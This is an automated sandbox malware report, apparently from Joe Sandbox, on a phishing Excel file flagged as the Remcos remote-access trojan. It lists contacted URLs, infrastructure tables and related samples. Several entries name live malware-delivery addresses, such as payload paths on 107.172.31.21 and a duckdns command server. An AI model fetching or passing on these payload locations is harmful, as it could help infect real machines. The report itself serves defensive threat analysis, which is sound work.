https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.google.com/chrome/?p=plugin_flash | RegAsm.exe, 0000000F.00000002.522516063.0000000002C80000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.522490434.0000000002A8E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.522503026.0000000002B30000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9 | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://www.nirsoft.net | RegAsm.exe, 0000000F.00000002.521695827.0000000000204000.00000004.00000010.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://deff.nelreports.net/api/report?cat=msn | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://www.imvu.com/LK | RegAsm.exe, 00000012.00000002.518576089.000000000037C000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://go.micros | powershell.exe, 0000000D.00000002.511591510.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://107.172.31.21 | powershell.exe, 0000000D.00000002.511591510.00000000024B9000.00000004.00000800.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cache.btrll.com/default/Pix-1x1.gif | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683 | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
https://www.google.com | RegAsm.exe, RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | powershell.exe, 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://o.aolcdn.com/ads/adswrappermsni.js | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://www.msn.com/?ocid=iehp | bhv2AF7.tmp.15.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033 | bhv2AF7.tmp.15.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://static.chartbeat.com/js/chartbeat.js | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://www.msn.com/de-de/?ocid=iehp | bhv2AF7.tmp.15.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto% | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
https://login.yahoo.com/config/login | RegAsm.exe | false | URL Reputation: safe | unknown
http://www.nirsoft.net/ | RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000B.00000002.516053834.0000000002431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.511591510.0000000002261000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia803104.us.archive.org/27/items/vbs_20240LR | powershell.exe, 0000000B.00000002.516053834.0000000002603000.00000004.00000800.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3 | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683 | bhv2AF7.tmp.15.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://zhort.de/FoNVg0yX | ~DFAEDAA30879C445E4.TMP.0.dr, 9EC30000.0.dr | false | Avira URL Cloud: safe | unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids( | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9 | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://crl.entrust.net/server1.crl0 | powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/8/nrrV73987.js | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://www.imvu.com | RegAsm.exe, RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000012.00000002.518814994.00000000005E9000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000D.00000002.512511300.0000000003289000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFU | EQNEDT32.EXE, 00000009.00000003.492215861.0000000000364000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.492251431.000000000036F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/ | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://www.msn.com/ | bhv2AF7.tmp.15.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549 | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
http://cdn.at.atwola.com/_media/uac/msn.html | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
https://www.google.com/accounts/servicelogin | RegAsm.exe | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
https://secure.comodo.com/CPS0 | powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://policies.yahoo.com/w3c/p3p.xml | bhv2AF7.tmp.15.dr | false | URL Reputation: safe | unknown
https://zhort.de/ | zhort.de.url.4.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://crl.entrust.net/2048ca.crl0 | powershell.exe, 0000000D.00000002.514548076.00000000050C2000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.msn.com/advertisement.ad.js | bhv2AF7.tmp.15.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://107.172.31.21/xampp/nbc/sweetbuttersmoothbananahereforyou.tIFj | EQNEDT32.EXE, 00000009.00000002.495162987.000000000031E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ebuddy.com | RegAsm.exe, RegAsm.exe, 00000012.00000002.518600244.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
207.241.232.154 | ia803104.us.archive.org | United States | 7941 | INTERNET-ARCHIVE (US) | true
192.210.214.9 | 2024remcmon.duckdns.org | United States | 36352 | AS-COLOCROSSING (US) | true
88.99.66.38 | zhort.de | Germany | 24940 | HETZNER-AS (DE) | true
107.172.31.21 | unknown | United States | 36352 | AS-COLOCROSSING (US) | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-AS ATOM86 (NL) | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1500264
Start date and time: 2024-08-28 06:52:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 20
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • GSI enabled (VBA)
                • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RFQ No. 109078906v.xla.xlsx
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winXLSX@19/30@11/5
                EGA Information:
                • Successful, ratio: 85.7%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 179
                • Number of non-executed functions: 326
                Cookbook Comments:
                • Found application associated with file extension: .xlsx
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer
                • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe, svchost.exe
                • Execution Graph export aborted for target powershell.exe, PID 3084 because it is empty
                • Not all processes were analyzed; the report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:54:02 | API Interceptor | 53x Sleep call for process: EQNEDT32.EXE modified
00:54:05 | API Interceptor | 6x Sleep call for process: wscript.exe modified
00:54:06 | API Interceptor | 100x Sleep call for process: powershell.exe modified
00:54:13 | API Interceptor | 360x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
207.241.232.154 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse |
207.241.232.154 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | Get hash | malicious | Remcos | Browse |
207.241.232.154 | another.rtf | Get hash | malicious | Remcos | Browse |
207.241.232.154 | Faktura.vbs | Get hash | malicious | Remcos | Browse |
207.241.232.154 | M12_20240821.xls | Get hash | malicious | Remcos | Browse |
207.241.232.154 | PO_20931.xls | Get hash | malicious | Remcos | Browse |
207.241.232.154 | PO082724.xls | Get hash | malicious | Remcos | Browse |
207.241.232.154 | PA-INV0230824 AUG.xla.xlsx | Get hash | malicious | Remcos | Browse |
207.241.232.154 | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse |
207.241.232.154 | SecuriteInfo.com.Exploit.ShellCode.69.10034.15296.rtf | Get hash | malicious | Remcos | Browse |
192.210.214.9 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse |
192.210.214.9 | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse |
192.210.214.9 | SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.14066.27544.rtf | Get hash | malicious | Remcos | Browse |
192.210.214.9 | PURCHASE ORDER.xla.xlsx | Get hash | malicious | Remcos | Browse |
192.210.214.9 | PURCHASE ORDER.xla.xlsx | Get hash | malicious | Remcos | Browse |
192.210.214.9 | PURCHASE ORDER.xla.xlsx | Get hash | malicious | Remcos | Browse |
192.210.214.9 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.6971.10894.rtf | Get hash | malicious | Remcos | Browse |
192.210.214.9 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.16107.31846.rtf | Get hash | malicious | Remcos | Browse |
192.210.214.9 | RFQ#TLPO24-14.xla.xlsx | Get hash | malicious | Remcos | Browse |
192.210.214.9 | RFQ#TLPO24-14.xla.xlsx | Get hash | malicious | Remcos | Browse |
88.99.66.38 | M12_20240821.xls | Get hash | malicious | Remcos | Browse |
88.99.66.38 | PO_20931.xls | Get hash | malicious | Remcos | Browse |
88.99.66.38 | 350.xls | Get hash | malicious | FormBook | Browse |
88.99.66.38 | PO082724.xls | Get hash | malicious | Remcos | Browse |
88.99.66.38 | SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx | Get hash | malicious | Unknown | Browse |
88.99.66.38 | SWIFT COPY.xls | Get hash | malicious | Remcos | Browse |
88.99.66.38 | RFQ_0826024.xla.xlsx | Get hash | malicious | Remcos | Browse |
107.172.31.21 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | 107.172.31.21/xampp/kkb/KLMN.txt
107.172.31.21 | Tl9bHdZo1S.hta | Get hash | malicious | Cobalt Strike, GuLoader | Browse | 107.172.31.21/450/MsMpEng.exe
107.172.31.21 | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 107.172.31.21/xampp/kkb/KLMN.txt
107.172.31.21 | SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx | Get hash | malicious | Unknown | Browse | 107.172.31.21/330/MsMpEng.exe
107.172.31.21 | Thermo Fisher RFQ_TFS-1407.xls | Get hash | malicious | GuLoader | Browse | 107.172.31.21/xampp/cbn/IEnetupdate.hta
178.237.33.50 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | another.rtf | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | rnr.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | thrylPXnvfySmGN.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exe | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | PRICE REQUEST RSM PQ24.docx.doc | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | Faktura.vbs | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | M12_20240821.xls | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
178.237.33.50 | PO_20931.xls | Get hash | malicious | Remcos | Browse | geoplugin.net/json.gp
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
2024remcmon.duckdns.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | 192.210.214.9
2024remcmon.duckdns.org | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 192.210.214.9
2024remcmon.duckdns.org | SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.14066.27544.rtf | Get hash | malicious | Remcos | Browse | 192.210.214.9
2024remcmon.duckdns.org | PURCHASE ORDER.xla.xlsx | Get hash | malicious | Remcos | Browse | 192.210.214.9
2024remcmon.duckdns.org | PURCHASE ORDER.xla.xlsx | Get hash | malicious | Remcos | Browse | 192.210.214.9
2024remcmon.duckdns.org | PURCHASE ORDER.xla.xlsx | Get hash | malicious | Remcos | Browse | 192.210.214.9
2024remcmon.duckdns.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.16107.31846.rtf | Get hash | malicious | Remcos | Browse | 192.210.214.9
2024remcmon.duckdns.org | RFQ#TLPO24-14.xla.xlsx | Get hash | malicious | Remcos | Browse | 192.210.214.9
2024remcmon.duckdns.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.7487.20111.rtf | Get hash | malicious | Remcos | Browse | 192.210.214.9
2024remcmon.duckdns.org | SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.13863.6146.xlsx | Get hash | malicious | Remcos | Browse | 192.210.214.9
zhort.de | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
zhort.de | PO_20931.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
zhort.de | 350.xls | Get hash | malicious | FormBook | Browse | 88.99.66.38
zhort.de | PO082724.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
zhort.de | SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsx | Get hash | malicious | Unknown | Browse | 88.99.66.38
zhort.de | SWIFT COPY.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
zhort.de | RFQ_0826024.xla.xlsx | Get hash | malicious | Remcos | Browse | 88.99.66.38
ia803104.us.archive.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
ia803104.us.archive.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
ia803104.us.archive.org | another.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
ia803104.us.archive.org | Faktura.vbs | Get hash | malicious | Remcos | Browse | 207.241.232.154
ia803104.us.archive.org | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
ia803104.us.archive.org | PO_20931.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
ia803104.us.archive.org | PO082724.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
ia803104.us.archive.org | PA-INV0230824 AUG.xla.xlsx | Get hash | malicious | Remcos | Browse | 207.241.232.154
ia803104.us.archive.org | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 207.241.232.154
ia803104.us.archive.org | SecuriteInfo.com.Exploit.ShellCode.69.10034.15296.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
geoplugin.net | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | another.rtf | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | rnr.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | thrylPXnvfySmGN.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exe | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | PRICE REQUEST RSM PQ24.docx.doc | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | Faktura.vbs | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 178.237.33.50
geoplugin.net | PO_20931.xls | Get hash | malicious | Remcos | Browse | 178.237.33.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | 107.172.31.21
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | Get hash | malicious | Remcos | Browse | 198.46.178.181
AS-COLOCROSSINGUS | another.rtf | Get hash | malicious | Remcos | Browse | 198.46.178.137
AS-COLOCROSSINGUS | RFQ No. 109078906.xla.xlsx | Get hash | malicious | Unknown | Browse | 192.210.214.138
AS-COLOCROSSINGUS | RFQ No. 109078906.xla.xlsx | Get hash | malicious | Unknown | Browse | 192.210.214.138
AS-COLOCROSSINGUS | RFQ No. 109078906.xla.xlsx | Get hash | malicious | Unknown | Browse | 192.210.214.138
AS-COLOCROSSINGUS | PO_20931.xls | Get hash | malicious | Remcos | Browse | 192.3.64.135
AS-COLOCROSSINGUS | PO082724.xls | Get hash | malicious | Remcos | Browse | 198.46.178.137
AS-COLOCROSSINGUS | Inv 30532.xls | Get hash | malicious | Remcos | Browse | 198.12.81.225
AS-COLOCROSSINGUS | French Group.js | Get hash | malicious | Remcos | Browse | 192.3.101.17
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
INTERNET-ARCHIVEUS | another.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
INTERNET-ARCHIVEUS | Faktura.vbs | Get hash | malicious | Remcos | Browse | 207.241.232.154
INTERNET-ARCHIVEUS | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
INTERNET-ARCHIVEUS | PO_20931.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
INTERNET-ARCHIVEUS | PO082724.xls | Get hash | malicious | Remcos | Browse | 207.241.232.154
INTERNET-ARCHIVEUS | PA-INV0230824 AUG.xla.xlsx | Get hash | malicious | Remcos | Browse | 207.241.232.154
INTERNET-ARCHIVEUS | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 207.241.232.154
INTERNET-ARCHIVEUS | SecuriteInfo.com.Exploit.ShellCode.69.10034.15296.rtf | Get hash | malicious | Remcos | Browse | 207.241.232.154
HETZNER-ASDE | ZKB - Zahlungsbestätigung an 20240828.pdf.exe | Get hash | malicious | Quasar | Browse | 195.201.57.90
HETZNER-ASDE | file.exe | Get hash | malicious | LummaC, Vidar | Browse | 94.130.188.148
HETZNER-ASDE | file.exe | Get hash | malicious | LummaC, Vidar | Browse | 94.130.188.148
HETZNER-ASDE | file.exe | Get hash | malicious | LummaC, Vidar | Browse | 94.130.188.148
HETZNER-ASDE | Setup.exe | Get hash | malicious | Vidar | Browse | 94.130.188.148
HETZNER-ASDE | file.exe | Get hash | malicious | Vidar | Browse | 94.130.188.148
HETZNER-ASDE | VakıfBank - Ödeme onay makbuzu 20240826.pdf.exe | Get hash | malicious | Quasar | Browse | 195.201.57.90
HETZNER-ASDE | Faktura.vbs | Get hash | malicious | Remcos | Browse | 135.181.213.52
HETZNER-ASDE | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
HETZNER-ASDE | PO_20931.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | 107.172.31.21
AS-COLOCROSSINGUS | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | Get hash | malicious | Remcos | Browse | 198.46.178.181
AS-COLOCROSSINGUS | another.rtf | Get hash | malicious | Remcos | Browse | 198.46.178.137
AS-COLOCROSSINGUS | RFQ No. 109078906.xla.xlsx | Get hash | malicious | Unknown | Browse | 192.210.214.138
AS-COLOCROSSINGUS | RFQ No. 109078906.xla.xlsx | Get hash | malicious | Unknown | Browse | 192.210.214.138
AS-COLOCROSSINGUS | RFQ No. 109078906.xla.xlsx | Get hash | malicious | Unknown | Browse | 192.210.214.138
AS-COLOCROSSINGUS | PO_20931.xls | Get hash | malicious | Remcos | Browse | 192.3.64.135
AS-COLOCROSSINGUS | PO082724.xls | Get hash | malicious | Remcos | Browse | 198.46.178.137
AS-COLOCROSSINGUS | Inv 30532.xls | Get hash | malicious | Remcos | Browse | 198.12.81.225
AS-COLOCROSSINGUS | French Group.js | Get hash | malicious | Remcos | Browse | 192.3.101.17
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | Get hash | malicious | Remcos | Browse | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | Get hash | malicious | Remcos | Browse | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | another.rtf | Get hash | malicious | Remcos | Browse | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | PO_20931.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | 350.xls | Get hash | malicious | FormBook | Browse | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | PO082724.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | PA-INV0230824 AUG.xla.xlsx | Get hash | malicious | Remcos | Browse | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | RFQ No. 109078906v.xla.xlsx | Get hash | malicious | Remcos | Browse | 88.99.66.38, 207.241.232.154
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.ShellCode.69.10034.15296.rtf | Get hash | malicious | Remcos | Browse | 88.99.66.38, 207.241.232.154
7dcce5b76c8b17472d024758970a406b | RFQ No. 109078906.xla.xlsx | Get hash | malicious | Unknown | Browse | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | M12_20240821.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | RFQ No. 109078906.xla.xlsx | Get hash | malicious | Unknown | Browse | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | PO_20931.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | 350.xls | Get hash | malicious | FormBook | Browse | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | PO082724.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | Inv 30532.xls | Get hash | malicious | Remcos | Browse | 88.99.66.38
7dcce5b76c8b17472d024758970a406b | PA-INV0230824 AUG.xla.xlsx | Get hash | malicious | Remcos | Browse | 88.99.66.38
